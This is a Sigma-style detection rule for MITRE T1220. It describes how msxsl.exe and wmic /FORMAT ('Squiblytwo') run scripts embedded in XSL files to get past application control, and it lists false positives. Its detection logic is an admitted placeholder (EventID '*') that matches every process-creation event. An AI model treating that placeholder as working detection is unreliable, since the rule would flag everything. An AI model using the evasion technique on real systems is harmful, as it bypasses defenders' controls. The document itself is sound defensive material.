title: XSL Script Processing (T1220)
id: df00tech-t1220
status: experimental
description: "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa."
references:
  - https://attack.mitre.org/techniques/T1220/
  - https://df00tech.com/detections/T1220
author: df00tech
date: 2026/04/13
tags:
  - attack.t1220
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate XSLT transformations performed by developers or build pipelines using msxsl.exe — rare since the tool is not installed by default
  - "WMIC reporting scripts that use /FORMAT with built-in XSL stylesheets from %SystemRoot%\\System32\\wbem\\en-US\\ (e.g., wmic process list /FORMAT:list.xsl)"
  - XML/XSLT tooling in CI/CD pipelines or data processing workflows that invoke msxsl.exe for document transformation
  - System administration scripts that legitimately use wmic /FORMAT for structured output — verify the XSL path resolves to a known-good system location
level: high